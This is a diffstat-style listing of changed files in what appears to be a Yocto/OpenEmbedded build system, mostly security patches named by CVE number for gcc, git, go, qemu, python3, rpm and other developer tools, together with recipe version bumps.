-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch1506
-rw-r--r--meta/recipes-devtools/gcc/gcc-common.inc3
-rw-r--r--meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-cross_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-cross_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-runtime_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-runtime_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-shared-source.inc3
-rw-r--r--meta/recipes-devtools/gcc/gcc-source.inc1
-rw-r--r--meta/recipes-devtools/gcc/gcc-source_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc-source_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/gcc_9.5.bb (renamed from meta/recipes-devtools/gcc/gcc_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgcc-initial_9.5.bb (renamed from meta/recipes-devtools/gcc/libgcc-initial_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgcc_9.5.bb (renamed from meta/recipes-devtools/gcc/libgcc_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gcc/libgfortran_9.5.bb (renamed from meta/recipes-devtools/gcc/libgfortran_9.3.bb)0
-rw-r--r--meta/recipes-devtools/gdb/gdb-9.1.inc1
-rw-r--r--meta/recipes-devtools/gdb/gdb-common.inc1
-rw-r--r--meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch75
-rw-r--r--meta/recipes-devtools/git/files/CVE-2021-40330.patch108
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-23521.patch367
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-01.patch39
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-02.patch187
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-03.patch146
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-04.patch150
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-05.patch98
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-06.patch90
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-07.patch123
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-08.patch67
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-09.patch162
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-10.patch99
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-11.patch90
-rw-r--r--meta/recipes-devtools/git/files/CVE-2022-41903-12.patch124
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-1.patch179
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-2.patch122
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-22490-3.patch154
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-23946.patch184
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-25652.patch94
-rw-r--r--meta/recipes-devtools/git/files/CVE-2023-29007.patch159
-rw-r--r--meta/recipes-devtools/git/git.inc35
-rw-r--r--meta/recipes-devtools/git/git/fixsort.patch36
-rw-r--r--meta/recipes-devtools/git/git_2.24.4.bb (renamed from meta/recipes-devtools/git/git_2.24.3.bb)4
-rw-r--r--meta/recipes-devtools/glide/glide_0.13.3.bb5
-rw-r--r--meta/recipes-devtools/gnu-config/gnu-config_git.bb3
-rw-r--r--meta/recipes-devtools/go/go-1.14.inc106
-rw-r--r--meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch74
-rw-r--r--meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch48
-rw-r--r--meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch36
-rw-r--r--meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch82
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch65
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch191
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch38
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33195.patch373
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33196.patch124
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch152
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch113
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch51
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch101
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch97
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch79
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch86
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch93
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch83
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch357
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch50
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch142
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch198
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch68
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch104
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch36
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch111
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch164
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch47
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch116
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch71
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch131
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch120
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch49
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch113
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch75
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch53
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch104
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch156
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch85
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch97
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch98
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch660
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch200
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch134
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch184
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24536_3.patch349
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch76
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch125
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch635
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch393
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch497
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch585
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch371
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch60
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch90
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch94
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch201
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch84
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch112
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch38
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch212
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch114
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch175
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch262
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch230
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch181
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch393
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch401
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch86
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch1697
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch121
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch271
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch205
-rw-r--r--meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch197
-rw-r--r--meta/recipes-devtools/go/go-crosssdk.inc2
-rw-r--r--meta/recipes-devtools/go/go-dep_0.5.4.bb2
-rw-r--r--meta/recipes-devtools/go/go_1.14.bb10
-rw-r--r--meta/recipes-devtools/help2man/help2man-native_1.47.11.bb3
-rw-r--r--meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb1
-rw-r--r--meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb1
-rw-r--r--meta/recipes-devtools/intltool/intltool_0.51.0.bb2
-rw-r--r--meta/recipes-devtools/jquery/jquery_3.5.0.bb6
-rw-r--r--meta/recipes-devtools/libcomps/libcomps_0.1.15.bb4
-rw-r--r--meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch58
-rw-r--r--meta/recipes-devtools/libdnf/libdnf_0.28.1.bb5
-rw-r--r--meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb2
-rw-r--r--meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch55
-rw-r--r--meta/recipes-devtools/librepo/librepo_1.11.2.bb5
-rw-r--r--meta/recipes-devtools/libtool/libtool-2.4.6.inc4
-rw-r--r--meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch35
-rw-r--r--meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch35
-rw-r--r--meta/recipes-devtools/libtool/libtool/lto-prefix.patch22
-rw-r--r--meta/recipes-devtools/libtool/libtool_2.4.6.bb2
-rw-r--r--meta/recipes-devtools/llvm/llvm_git.bb2
-rw-r--r--meta/recipes-devtools/m4/m4-1.4.18.inc1
-rw-r--r--meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch84
-rw-r--r--meta/recipes-devtools/makedevs/makedevs_1.0.1.bb1
-rw-r--r--meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch431
-rw-r--r--meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb1
-rw-r--r--meta/recipes-devtools/mmc/mmc-utils_git.bb1
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch62
-rw-r--r--meta/recipes-devtools/mtd/mtd-utils_git.bb12
-rw-r--r--meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch42
-rw-r--r--meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch104
-rw-r--r--meta/recipes-devtools/nasm/nasm_2.15.05.bb (renamed from meta/recipes-devtools/nasm/nasm_2.15.03.bb)7
-rw-r--r--meta/recipes-devtools/ninja/ninja_1.10.0.bb6
-rw-r--r--meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch50
-rw-r--r--meta/recipes-devtools/opkg/opkg_0.4.2.bb6
-rw-r--r--meta/recipes-devtools/orc/orc_0.4.31.bb1
-rw-r--r--meta/recipes-devtools/patchelf/patchelf_0.10.bb11
-rw-r--r--meta/recipes-devtools/perl/files/CVE-2023-31484.patch27
-rw-r--r--meta/recipes-devtools/perl/files/CVE-2023-47038.patch121
-rw-r--r--meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb1
-rw-r--r--meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb1
-rw-r--r--meta/recipes-devtools/perl/perl_5.30.1.bb7
-rw-r--r--meta/recipes-devtools/pkgconfig/pkgconfig_git.bb2
-rwxr-xr-xmeta/recipes-devtools/pseudo/files/build-oldlibc20
-rw-r--r--meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch57
-rw-r--r--meta/recipes-devtools/pseudo/pseudo.inc14
-rw-r--r--meta/recipes-devtools/pseudo/pseudo_git.bb9
-rw-r--r--meta/recipes-devtools/python-numpy/python-numpy.inc2
-rw-r--r--meta/recipes-devtools/python/python-setuptools.inc2
-rw-r--r--meta/recipes-devtools/python/python3-jinja2_2.11.3.bb (renamed from meta/recipes-devtools/python/python3-jinja2_2.11.2.bb)5
-rw-r--r--meta/recipes-devtools/python/python3-magic_0.4.15.bb7
-rw-r--r--meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch48
-rw-r--r--meta/recipes-devtools/python/python3-pip_20.0.2.bb1
-rw-r--r--meta/recipes-devtools/python/python3-pygobject_3.34.0.bb2
-rw-r--r--meta/recipes-devtools/python/python3-scons_3.1.2.bb1
-rw-r--r--meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch29
-rw-r--r--meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch42
-rw-r--r--meta/recipes-devtools/python/python3/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch248
-rw-r--r--meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch33
-rw-r--r--meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch24
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2019-20907.patch44
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-14422.patch77
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-26116.patch104
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2020-27619.patch70
-rw-r--r--meta/recipes-devtools/python/python3/CVE-2023-24329.patch80
-rw-r--r--meta/recipes-devtools/python/python3/makerace.patch23
-rw-r--r--meta/recipes-devtools/python/python3/python3-manifest.json4
-rw-r--r--meta/recipes-devtools/python/python3_3.8.18.bb (renamed from meta/recipes-devtools/python/python3_3.8.2.bb)28
-rw-r--r--meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb2
-rw-r--r--meta/recipes-devtools/qemu/qemu.inc163
-rw-r--r--meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch9
-rw-r--r--meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch63
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch164
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch139
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch100
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch266
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch112
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch86
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch139
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch54
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch91
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch69
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch65
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch69
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch61
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch50
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch94
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch46
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch101
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch73
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch48
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch45
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch51
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch45
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch81
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch62
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch74
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch67
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch55
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch92
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch85
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch103
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch71
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch93
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch177
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch40
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch44
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch59
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch29
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch39
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch46
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch47
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch40
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch80
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch41
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch67
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch124
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch180
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch81
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch89
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch43
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch42
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch52
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch57
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch53
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch103
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch77
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch178
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch49
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch87
-rw-r--r--meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch114
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch146
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch55
-rw-r--r--meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch236
-rw-r--r--meta/recipes-devtools/qemu/qemu_4.2.0.bb5
-rw-r--r--meta/recipes-devtools/quilt/quilt.inc1
-rw-r--r--meta/recipes-devtools/quilt/quilt/faildiff-order.patch41
-rw-r--r--meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch25
-rw-r--r--meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch34
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-20266.patch109
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3421.patch197
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch60
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch55
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch34
-rw-r--r--meta/recipes-devtools/rpm/files/CVE-2021-3521.patch330
-rw-r--r--meta/recipes-devtools/rpm/rpm_4.14.2.1.bb12
-rw-r--r--meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch31
-rw-r--r--meta/recipes-devtools/rsync/files/CVE-2022-29154.patch334
-rw-r--r--meta/recipes-devtools/rsync/rsync_3.1.3.bb3
-rw-r--r--meta/recipes-devtools/ruby/ruby.inc4
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch40
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch139
-rw-r--r--meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch61
-rw-r--r--meta/recipes-devtools/ruby/ruby_2.7.6.bb (renamed from meta/recipes-devtools/ruby/ruby_2.7.1.bb)11
-rwxr-xr-xmeta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts10
-rw-r--r--meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service2
-rw-r--r--meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb1
-rw-r--r--meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch253
-rw-r--r--meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb5
-rw-r--r--meta/recipes-devtools/strace/strace_5.5.bb1
-rw-r--r--meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch117
-rw-r--r--meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch146
-rw-r--r--meta/recipes-devtools/subversion/subversion_1.13.0.bb3
-rw-r--r--meta/recipes-devtools/swig/swig/determinism.patch19
-rw-r--r--meta/recipes-devtools/swig/swig_3.0.12.bb1
-rw-r--r--meta/recipes-devtools/syslinux/syslinux/determinism.patch22
-rw-r--r--meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb6
-rw-r--r--meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb8
-rw-r--r--meta/recipes-devtools/tcf-agent/tcf-agent_git.bb3
-rw-r--r--meta/recipes-devtools/tcltk/tcl_8.6.10.bb1
-rw-r--r--meta/recipes-devtools/unfs3/unfs3_git.bb5
-rw-r--r--meta/recipes-devtools/unifdef/unifdef_2.12.bb1
-rw-r--r--meta/recipes-devtools/vala/vala.inc2
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch9
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-aarch641
-rw-r--r--meta/recipes-devtools/valgrind/valgrind/remove-for-all2
-rw-r--r--meta/recipes-devtools/valgrind/valgrind_3.15.0.bb3
-rw-r--r--meta/recipes-devtools/xmlto/xmlto_0.0.28.bb3
-rw-r--r--meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch42
-rw-r--r--meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb5
-rw-r--r--meta/recipes-extended/bash/bash.inc6
-rw-r--r--meta/recipes-extended/bc/bc_1.07.1.bb3
-rw-r--r--meta/recipes-extended/bzip2/bzip2/Makefile.am2
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch58
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch312
-rw-r--r--meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch581
-rw-r--r--meta/recipes-extended/cpio/cpio_2.13.bb6
-rw-r--r--meta/recipes-extended/cracklib/cracklib_2.9.5.bb3
-rw-r--r--meta/recipes-extended/cups/cups.inc14
